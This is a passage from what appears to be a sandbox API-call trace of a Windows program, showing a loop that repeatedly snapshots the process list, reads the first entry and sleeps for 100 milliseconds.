th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.995] Sleep (dwMilliseconds=0x64) [0154.014] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0154.026] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.093] Sleep (dwMilliseconds=0x64) [0154.106] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0154.116] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.183] Sleep (dwMilliseconds=0x64) [0154.218] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0154.231] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.291] Sleep (dwMilliseconds=0x64) [0154.301] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0154.320] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.398] Sleep (dwMilliseconds=0x64) [0154.403] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0154.414] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.519] Sleep (dwMilliseconds=0x64) [0154.528] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0154.550] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.649] Sleep (dwMilliseconds=0x64) [0154.653] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0154.667] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.755] Sleep (dwMilliseconds=0x64) [0154.765] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0154.776] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.879] Sleep (dwMilliseconds=0x64) [0154.891] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0154.913] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.089] Sleep (dwMilliseconds=0x64) [0155.109] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0155.126] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.284] Sleep (dwMilliseconds=0x64) [0155.295] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0155.314] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.398] Sleep (dwMilliseconds=0x64) [0155.402] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0155.415] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.493] Sleep (dwMilliseconds=0x64) [0155.498] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0155.510] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.588] Sleep (dwMilliseconds=0x64) [0155.592] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0155.610] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.690] Sleep (dwMilliseconds=0x64) [0155.700] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0155.718] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.791] Sleep (dwMilliseconds=0x64) [0155.795] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0155.807] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.879] Sleep (dwMilliseconds=0x64) [0155.887] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0155.901] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.964] Sleep (dwMilliseconds=0x64) [0155.982] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0155.993] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.059] Sleep (dwMilliseconds=0x64) [0156.086] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0156.101] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.224] Sleep (dwMilliseconds=0x64) [0156.284] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0156.299] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.381] Sleep (dwMilliseconds=0x64) [0156.388] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0156.401] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.480] Sleep (dwMilliseconds=0x64) [0156.500] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0156.510] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.604] Sleep (dwMilliseconds=0x64) [0156.610] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0156.634] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.738] Sleep (dwMilliseconds=0x64) [0156.750] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0156.769] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.862] Sleep (dwMilliseconds=0x64) [0156.875] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0156.891] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.964] Sleep (dwMilliseconds=0x64) [0156.985] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0157.005] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.101] Sleep (dwMilliseconds=0x64) [0157.106] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0157.116] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.197] Sleep (dwMilliseconds=0x64) [0157.202] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0157.220] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.407] Sleep (dwMilliseconds=0x64) [0157.421] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0157.433] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.522] Sleep (dwMilliseconds=0x64) [0157.529] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0157.542] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.628] Sleep (dwMilliseconds=0x64) [0157.641] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0157.661] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.743] Sleep (dwMilliseconds=0x64) [0157.749] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0157.759] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.834] Sleep (dwMilliseconds=0x64) [0157.857] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0157.868] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.990] Sleep (dwMilliseconds=0x64) [0158.004] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0158.033] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.128] Sleep (dwMilliseconds=0x64) [0158.141] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0158.161] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.243] Sleep (dwMilliseconds=0x64) [0158.249] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0158.267] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.392] Sleep (dwMilliseconds=0x64) [0158.403] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0158.416] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.512] Sleep (dwMilliseconds=0x64) [0158.530] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0158.540] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.632] Sleep (dwMilliseconds=0x64) [0158.639] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0158.651] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.729] Sleep (dwMilliseconds=0x64) [0158.733] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0158.743] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.867] Sleep (dwMilliseconds=0x64) [0158.877] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x163c [0158.900] Process32First (in: hSnapshot=0x163c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.004] Sleep (dwMilliseconds=0x64) [0159.016] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0159.044] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.164] Sleep (dwMilliseconds=0x64) [0159.170] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0159.180] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.249] Sleep (dwMilliseconds=0x64) [0159.263] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0159.275] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.390] Sleep (dwMilliseconds=0x64) [0159.404] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0159.416] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.516] Sleep (dwMilliseconds=0x64) [0159.533] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0159.551] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.648] Sleep (dwMilliseconds=0x64) [0159.653] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0159.665] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.879] Sleep (dwMilliseconds=0x64) [0159.926] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0159.944] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.129] Sleep (dwMilliseconds=0x64) [0160.185] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0160.196] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.375] Sleep (dwMilliseconds=0x64) [0160.388] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0160.398] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.646] Sleep (dwMilliseconds=0x64) [0160.701] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0160.712] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.838] Sleep (dwMilliseconds=0x64) [0160.841] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0160.852] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.070] Sleep (dwMilliseconds=0x64) [0161.082] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0161.098] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.177] Sleep (dwMilliseconds=0x64) [0161.184] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0161.198] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.300] Sleep (dwMilliseconds=0x64) [0161.339] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0161.354] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.456] Sleep (dwMilliseconds=0x64) [0161.483] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0161.502] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.598] Sleep (dwMilliseconds=0x64) [0161.607] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0161.619] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.715] Sleep (dwMilliseconds=0x64) [0161.734] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0161.754] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.916] Sleep (dwMilliseconds=0x64) [0161.925] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0161.946] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.023] Sleep (dwMilliseconds=0x64) [0162.027] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0162.038] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.129] Sleep (dwMilliseconds=0x64) [0162.140] CreateToolhelp32Snapshot (dwFlags=0x2, 